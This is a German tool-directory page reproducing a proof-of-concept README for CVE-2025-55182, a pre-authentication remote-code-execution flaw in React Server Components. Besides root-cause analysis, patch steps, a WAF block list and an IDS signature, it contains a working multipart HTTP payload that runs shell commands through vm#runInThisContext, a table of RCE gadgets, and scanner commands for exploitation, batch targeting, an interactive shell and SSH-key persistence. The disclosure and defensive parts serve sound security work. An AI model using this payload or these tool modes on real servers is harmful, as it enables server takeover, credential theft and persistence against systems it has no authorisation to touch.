Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-POC-SCANNER — Vereinheitlichtes Sicherheitsforschungstool | Kitploit
Tools/GitHubGitHub/im-hanzou/cve-2025-55182-poc-scanner
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsPapers & ForschungLernen & BildungRed TeamingPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHubim-hanzou/cve-2025-55182-poc-scanner

CVE-2025-55182-POC-SCANNER

Vereinheitlichtes Sicherheitsforschungstool

Repository anzeigen
8vor 9 MonatenNoch nicht geprüft
Teilen

CVE-2025-55182: Kritische Pre-Authentication RCE in React Server Components

CVE-2025-55182 CVSS 10.0 Affected React Versions Affected Next.js Versions

Sicherheitsforschung von schema.cx
„Kontrolle ist eine Illusion. Es sind die Systeme, die wir bauen, die uns kontrollieren – es sei denn, wir verstehen sie zuerst.“


📋 Inhaltsverzeichnis

  • Haftungsausschluss und rechtliche Hinweise
  • Zusammenfassung
  • Technische Beschreibung
  • Betroffene Systeme
  • Proof of Concept
  • Auswirkungsbewertung
  • Minderung und Abhilfe
  • Zeitplan der verantwortungsvollen Offenlegung
  • Referenzen
  • Zuschreibung

⚠️ Haftungsausschluss und rechtliche Hinweise

DIESES WERKZEUG IST NUR FÜR AUTORISIERTE SICHERHEITSTESTS

STOPP. LESEN SIE DIES, BEVOR SIE FORTFAHREN.

Dieses Repository enthält Proof-of-Code für eine kritische Sicherheitslücke. Durch den Zugriff, das Herunterladen oder die Nutzung von Materialien in diesem Repository erkennen Sie Folgendes an und stimmen zu:

Rechtliche Anforderungen

  1. Schriftliche Genehmigung erforderlich: Sie MÜSSEN eine ausdrückliche, schriftliche Genehmigung des Systemeigentümers haben, bevor Sie Sicherheitstests durchführen. Mündliche Vereinbarungen reichen nicht aus.

  2. Umfangsbeschränkungen: Tests müssen auf Systeme beschränkt sein, die in Ihrer Genehmigung ausdrücklich aufgeführt sind. „Scope Creep“ ist nicht gestattet.

  3. Anwendbare Gesetze: Unbefugter Zugriff auf Computersysteme verstößt gegen:

    • Vereinigte Staaten: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. § 1030
    • Europäische Union: Richtlinie 2013/40/EU über Angriffe auf Informationssysteme
    • Vereinigtes Königreich: Computer Misuse Act 1990
    • Australien: Criminal Code Act 1995, Division 477-478
    • Andere Rechtsordnungen: Ähnliche Computergesetze gelten weltweit

Haftungsausschluss

DIE AUTOREN UND MITWIRKENDEN DIESES REPOSITORY:

  • Übernehmen KEINE Verantwortung für Missbrauch dieses Werkzeugs
  • Geben KEINE Garantie, weder ausdrücklich noch stillschweigend
  • Haften NICHT für Schäden, die durch die Nutzung oder Unmöglichkeit der Nutzung dieser Software entstehen
  • Befürworten keine illegalen Aktivitäten jeglicher Art

Ethische Richtlinien

  • Testen Sie niemals ohne Erlaubnis – auch wenn Sie „nur überprüfen“ möchten
  • Dokumentieren Sie alles – führen Sie detaillierte Protokolle aller Testaktivitäten
  • Minimieren Sie die Auswirkungen – verwenden Sie die am wenigsten invasiven Methoden
  • Melden Sie verantwortungsvoll – befolgen Sie koordinierte Offenlegungsverfahren
  • Respektieren Sie die Privatsphäre – exfiltrieren oder speichern Sie keine sensiblen Daten

„Die Frage ist nicht, ob wir die Schwachstelle ausnutzen können. Es ist die Frage, ob wir es sollten und zu welchem Zweck.“


📊 Zusammenfassung

CVE-2025-55182 ist eine kritische Pre-Authentication Remote Code Execution (RCE) Schwachstelle, die React Server Components in React 19.x- und Next.js 15.x-16.x-Anwendungen betrifft.

Geschäftsauswirkung

Diese Schwachstelle ermöglicht es jedem nicht authentifizierten Angreifer mit Netzwerkzugriff auf eine angreifbare Anwendung, beliebige Befehle auf dem Server auszuführen. Der Angriff erfordert keine Anmeldedaten, keine Benutzerinteraktion und kann vollständig automatisiert werden. Eine erfolgreiche Ausnutzung führt zu:

  • Vollständiger Serverkompromittierung – Angreifer erlangen die vollständige Kontrolle über das zugrunde liegende System
  • Potenziellem Datenverlust – Zugriff auf Datenbanken, Umgebungsvariablen, Geheimnisse und Benutzerdaten
  • Seitwärtsbewegung – Kompromittierte Server können zum Angriff auf interne Netzwerke verwendet werden
  • Lieferkettenrisiko – Produktionssysteme, die Millionen von Benutzern bedienen, können betroffen sein

Schweregradbewertung

„Menschen vertrauen Systemen, weil sie sie nicht verstehen. Dieses Vertrauen ist eine Schwachstelle.“


🔬 Technische Beschreibung

Ursachenanalyse

Die Schwachstelle existiert in der Implementierung von Reacts Flight-Protokoll innerhalb der Funktion requireModule. Diese Funktion verwendet die Klammernotation, um auf Modulexporte basierend auf benutzergesteuerter Eingabe zuzugreifen, ohne zu validieren, dass die angeforderte Eigenschaft eine eigene Eigenschaft des Moduls ist.

Position des angreifbaren Codes:

root@kitploit:~
react-server-dom-webpack/cjs/react-server-dom-webpack-server.node.development.js
Funktion: requireModule (ca. Zeilen 2546-2558 in v19.0.0)

Angreifbares Muster:

root@kitploit:~
function requireModule(metadata) {
  var moduleExports = __webpack_require__(metadata[0]);
  // ... asynchrone Behandlung ...
  return moduleExports[metadata[2]];  // ← ANGREIFBAR: Keine hasOwnProperty-Prüfung
}

Ausnutzungsmechanismus

Der Angriff nutzt die Prototyp-Ketten-Traversierung in JavaScript:

  1. Einstiegspunkt: Der Angreifer sendet eine bösartige Multipart-Formularanfrage an einen Server-Action-Endpunkt
  2. Payload-Injektion: Das Feld $ACTION_0:0 enthält JSON mit von Angreifer kontrollierten Eigenschaften id (Modul#Export-Format) und bound (Argumente)
  3. Prototyp-Zugriff: Durch Angabe von Exporten wie constructor oder Zugriff auf Prototyp-Eigenschaften können Angreifer auf integrierte Node.js-Module verweisen
  4. RCE-Gadgets: Funktionen wie vm.runInThisContext, child_process.execSync oder fs.readFileSync werden mit vom Angreifer bereitgestellten Argumenten ausgeführt

Angriffsvektor

root@kitploit:~
HTTP POST /formaction
    ↓
decodeAction(formData, serverManifest)
    ↓
loadServerReference(manifest, value.id, value.bound)
    ↓
resolveServerReference(config, id)  // Analysiert "Modul#Export"-Format
    ↓
requireModule(metadata)
    ↓
moduleExports[metadata[2]]  // Prototyp-Kettenzugriff → RCE

Payload-Struktur

root@kitploit:~
POST /api/action HTTP/1.1
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"

------Boundary
Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"vm#runInThisContext","bound":["require('child_process').execSync('whoami').toString()"]}
------Boundary--

Verfügbare RCE-Gadgets

„Jedes System hat eine Tür. Die Frage ist, ob Sie das Schloss selbst gebaut haben – oder ob Sie es von jemandem geerbt haben, der nie Besucher erwartet hat.“


🎯 Betroffene Systeme

Angreifbare Versionen

ProduktAngreifbare VersionenGepatchte Versionen
React19.0.0, 19.1.0, 19.1.1, 19.2.019.0.1+, 19.1.2+, 19.2.1+
Next.js15.x, 16.x (verwendet angreifbares React)Versionen mit gepatchtem React

Voraussetzungen für die Ausnutzung

  1. React Server Components aktiviert: Die Anwendung verwendet RSC mit Server Actions
  2. Angreifbare React-Version: Eine der betroffenen Versionen wird verwendet
  3. Netzwerkzugriff: Der Angreifer kann Server-Action-Endpunkte erreichen
  4. Gefährliche Module im Bundle: Für direkte RCE müssen Module wie vm, child_process oder fs im Webpack-Bundle sein

Plattformanforderungen

  • Laufzeit: Node.js (jede Version, die React 19 unterstützt)
  • Framework: Next.js App Router oder benutzerdefinierte RSC-Implementierung
  • Keine zusätzliche Konfiguration erforderlich, um angreifbar zu sein

Wahrscheinlichkeit gefährlicher Module


🔧 Proof of Concept

Scanner-Werkzeug

Dieses Repository enthält einen umfassenden Python-basierten Sicherheitsscanner mit mehreren Betriebsmodi.

Repository-Struktur

root@kitploit:~
CVE-2025-55182-poc/
├── README.md                    # Diese Datei
├── scanner/
│   ├── __init__.py             # Python-Paket-Initialisierung
│   ├── scanner.py              # Hauptscanner (6 Modi)
│   ├── readme.md               # Detaillierte Scanner-Dokumentation
│   ├── requirements.txt        # Python-Abhängigkeiten
│   └── docs/
│       ├── TECHNICAL-ANALYSIS.md    # Tiefergehende Analyse der Schwachstelle
│       └── VULNERABLE-PACKAGES.md   # Betroffene Paketversionen

Installation:

root@kitploit:~
cd scanner
pip install -r requirements.txt

Grundlegende Nutzungsbeispiele

Schwachstellenscan:

root@kitploit:~
# Prüfen, ob das Ziel angreifbar ist
python scanner.py scan https://target.com

Gadget-Erkennung:

root@kitploit:~
# Verfügbare RCE-Gadgets identifizieren
python scanner.py exploit https://target.com --detect-gadgets

Befehlsausführung (mit Autorisierung):

root@kitploit:~
# Befehl auf angreifbarem Ziel ausführen
python scanner.py exploit https://target.com -c "whoami"

Stapeltest:

root@kitploit:~
# Mehrere Ziele aus einer Datei testen
python scanner.py batch -f targets.txt -o results.json

Automatisiertes Scannen mit Verifikation:

root@kitploit:~
# Umfassender Scan mit Exploit-Verifikation
python scanner.py auto -f targets.txt -o report.txt

Erwartete Ausgabe

Angreifbares Ziel:

root@kitploit:~
[+] VULNERABLE to CVE-2025-55182!
    Framework: Next.js
    Version: 15.1.0
    Confidence: HIGH
    
Available Gadgets:
  ✓ vm#runInThisContext
  ✓ child_process#execSync
  ✓ fs#readFileSync
  ✓ fs#writeFileSync

Gepatchtes Ziel:

root@kitploit:~
[-] Not vulnerable or unable to determine
    Framework detected: Next.js
    Version: 15.2.0 (patched)

Scanner-Modi

Funktionen

  • Framework-Erkennung: Identifiziert Next.js/React-Anwendungen vor der Ausnutzung
  • WAF/CDN-Erkennung: Erkennt Cloudflare, Akamai, Incapsula, AWS WAF, Azure WAF und mehr
  • Mehrere RCE-Gadgets: Ausnutzungspfade über vm, child_process, fs, module
  • Zwei-Schritt-RCE: Alternative Ausnutzung über fs#writeFileSync + module#_load
  • Verifikation: Bestätigt Exploits mit Ausführungsnachweis
  • Falsch-Positiv-Prävention: Intelligente Filterung von HTML/WAF-Antworten
  • Berichterstattung: Ausgabe im Text-, JSON- und HTML-Format

Die vollständige Dokumentation finden Sie unter scanner/readme.md.

„Ein Werkzeug ist nur so gefährlich wie die Absicht dahinter. In den richtigen Händen wird eine Waffe zum Schild.“


💥 Auswirkungsbewertung

Auswirkung auf die Vertraulichkeit: HOCH

  • Umgebungsvariablen: Datenbank-Anmeldedaten, API-Schlüssel, Geheimnisse
  • Quellcode: Anwendungslogik, proprietäre Algorithmen
  • Benutzerdaten: Persönliche Informationen, Authentifizierungstoken
  • Systemdateien: /etc/passwd, SSH-Schlüssel, Cloud-Anmeldedaten
  • Interne Netzwerke: Ausgangspunkt für weitere Angriffe

Auswirkung auf die Integrität: HOCH

  • Code-Injektion: Hintertüren in Anwendungsdateien
  • Datenmanipulation: Datenbankänderungen
  • Konfigurationsänderungen: Sicherheitseinstellungen, Zugriffskontrollen
  • Persistenzmechanismen: Cron-Jobs, Startskripte, SSH-Schlüssel

Auswirkung auf die Verfügbarkeit: HOCH

  • Dienstunterbrechung: Prozessbeendigung, Ressourcenerschöpfung
  • Datenvernichtung: Dateilöschung, Datenbank-Drops
  • Ransomware-Einsatz: Verschlüsselung kritischer Dateien
  • Vollständige Systemkompromittierung: Vollständige administrative Kontrolle

Angriffsszenarien

  1. Datenpanne: Angreifer liest .env-Dateien mit Datenbank-Anmeldedaten und exfiltriert Kundendaten

  2. Cryptominer-Installation: Angreifer schreibt Mining-Skript, fügt Cron-Job für Persistenz hinzu

  3. Lieferkettenangriff: Angreifer ändert Quellcode in der Produktion und liefert bösartigen Inhalt an Benutzer

  4. Seitwärtsbewegung: Kompromittierter Server wird zum Angriff auf interne Datenbanken, APIs und Dienste verwendet

  5. Ransomware: Angreifer verschlüsselt Anwendungsdateien und fordert Zahlung für Entschlüsselungsschlüssel


🛡️ Minderung und Abhilfe

Sofortmaßnahmen (sofort durchführen)

  1. React sofort aktualisieren

    root@kitploit:~
    npm update react react-dom react-server-dom-webpack
    

    Zielversionen: 19.0.1+, 19.1.2+ oder 19.2.1+

  2. Patch-Anwendung überprüfen

    root@kitploit:~
    npm ls react
    

    Stellen Sie sicher, dass keine angreifbaren Versionen in Ihrem Abhängigkeitsbaum verbleiben

WAF/Firewall-Regeln

Blockieren Sie Anfragen, die diese Muster enthalten:

root@kitploit:~
# Anfragekörper-Muster zum Blockieren
#constructor
#__proto__
#prototype
vm#runInThisContext
vm#runInNewContext
child_process#execSync
child_process#execFileSync
child_process#spawnSync
module#_load
fs#readFileSync
fs#writeFileSync

Härtung der Next.js-Konfiguration

Schließen Sie gefährliche Pakete vom Webpack-Bundling aus:

root@kitploit:~
// next.config.js
module.exports = {
  serverExternalPackages: [
    'sharp',
    'puppeteer',
    'execa',
    'shelljs',
    'vm2'
  ]
}

Erkennung und Überwachung

Zu überwachende Log-Muster:

  • Ungewöhnliche $ACTION_REF_- oder $ACTION_ID_-Felder in Anfragekörpern
  • POST-Anfragen an /api/*-Endpunkte mit Multipart-Formulardaten, die JSON enthalten
  • Fehlermeldungen, die auf constructor, prototype oder unerwarteten Modulzugriff verweisen

Intrusion-Detection-Signaturen:

root@kitploit:~
alert http any any -> $HOME_NET any (
  msg:"CVE-2025-55182 Exploit Attempt";
  content:"$ACTION_";
  content:"#constructor"; distance:0;
  sid:2025551820; rev:1;
)

Langfristige Empfehlungen

  1. Abhängigkeitsprüfung: Regelmäßige Scans mit npm audit, Snyk oder ähnlichen Werkzeugen
  2. Sicherheitsupdates: Automatisierte Abhängigkeitsupdates über Dependabot oder Renovate
  3. Eingabevalidierung: Vertrauen Sie niemals Benutzereingaben bei Eigenschaftszugriffsmustern
  4. Prinzip der geringsten Privilegien: Führen Sie Anwendungen mit minimal erforderlichen Berechtigungen aus
  5. Netzwerksegmentierung: Isolieren Sie Produktionssysteme von internen Netzwerken

„Patchen bedeutet nicht nur, zu reparieren, was kaputt ist. Es bedeutet, die Türen zu schließen, von denen Sie nicht wussten, dass sie offen sind.“


📅 Zeitplan der verantwortungsvollen Offenlegung

Diese Offenlegung folgt den CERT/CC Vulnerability Disclosure Guidelines und den ISO/IEC 29147:2018-Standards für koordinierte Offenlegung von Schwachstellen.


📚 Referenzen

Offizielle Ressourcen

  • CVE-Eintrag: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55182
  • NVD-Eintrag: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

Hinweise des Anbieters

  • React-Sicherheitshinweise: https://github.com/facebook/react/security/advisories
  • Next.js-Sicherheit: https://nextjs.org/docs/security

Verwandte Forschung

  • Technische Analyse (Tiefgang)
  • Analyse angreifbarer Pakete

Hintergrundlektüre

  • OWASP – Prototype Pollution
  • Node.js VM-Modul-Sicherheit
  • React Server Components RFC

🏆 Zuschreibung

Ursprüngliche Forschung

Dieser Proof-of-Concept wurde vom Sicherheitsforschungsteam bei schema.cx entwickelt.

Repository: https://github.com/ejpir/CVE-2025-55182-poc

Danksagungen

Wir danken:

  • Den Sicherheitsteams von React und Next.js für ihre schnelle Reaktion
  • Der Sicherheitsforschungsgemeinschaft für die gemeinsame Analyse
  • MITRE für die CVE-Koordination

📜 Lizenz

Dieses Projekt wird nur für Bildungszwecke und autorisierte Sicherheitsforschung veröffentlicht.

Durch die Nutzung dieser Software stimmen Sie zu:

  1. Sie nur auf Systemen zu verwenden, die Sie besitzen oder für die Sie ausdrückliche Genehmigung zum Testen haben
  2. Verantwortungsvolle Offenlegungspraktiken zu befolgen
  3. Sie nicht für böswillige Zwecke zu verwenden
  4. Die volle Verantwortung für Ihre Handlungen zu übernehmen

„Wir hacken nicht, um zu zerstören. Wir hacken, um zu verstehen. Und Verstehen ist der erste Schritt, um etwas Besseres zu bauen.“

schema.cx – Sicherheitsforschung für eine sicherere digitale Welt

Tool herunterladen
MetrikBewertung
CVSS v3.1 Basisscore10.0 KRITISCH
AngriffsvektorNetzwerk
AngriffskomplexitätNiedrig
Erforderliche PrivilegienKeine
BenutzerinteraktionKeine
Auswirkung (V/I/V)Hoch / Hoch / Hoch
GadgetModulBeschreibungAuswirkung
vm#runInThisContextvmFührt JS im aktuellen Kontext ausDirekte RCE
vm#runInNewContextvmFührt JS in einer Sandbox (ausbrechbar) ausDirekte RCE
child_process#execSyncchild_processFührt Shell-Befehle ausDirekte RCE
child_process#spawnSyncchild_processStartet ProzesseDirekte RCE
fs#readFileSyncfsLiest beliebige DateienDatencx-filtration
fs#writeFileSyncfsSchreibt beliebige DateienPersistenz/Hintertür
module#_loadmoduleLädt JS-Module (2-Schritt-RCE)Indirekte RCE
ModulWahrscheinlichkeit im BundleHäufige Quellen
fsSehr hochfs-extra, gray-matter, multer, sharp, chokidar
child_processMittel-hochexeca, shelljs, puppeteer, sharp, PDF-Generatoren
vmNiedrig-mittelejs, pug, Template-Engines
moduleSehr niedrigtsx, ts-node (normalerweise nur CLI)
ModusZweck
scanSchwachstellenerkennung und Fingerprinting
exploitKontrollierte Ausnutzung mit bestimmten Gadgets
shellInteraktive Befehlsshell auf angreifbaren Zielen
batchTesten mehrerer URLs mit Statistiken
autoAutomatisiertes Mehrziel-Scannen mit Verifikation
persistPersistenzangriffsdemonstrationen (SSH-Schlüssel, Anmeldedaten)
DatumEreignis
EntdeckungInformationen ausstehend
Benachrichtigung des AnbietersInformationen ausstehend
Bestätigung durch den AnbieterInformationen ausstehend
Patch-EntwicklungInformationen ausstehend
Patch-VeröffentlichungReact 19.0.1, 19.1.2, 19.2.1
Öffentliche OffenlegungInformationen ausstehend
CVE-ZuweisungCVE-2025-55182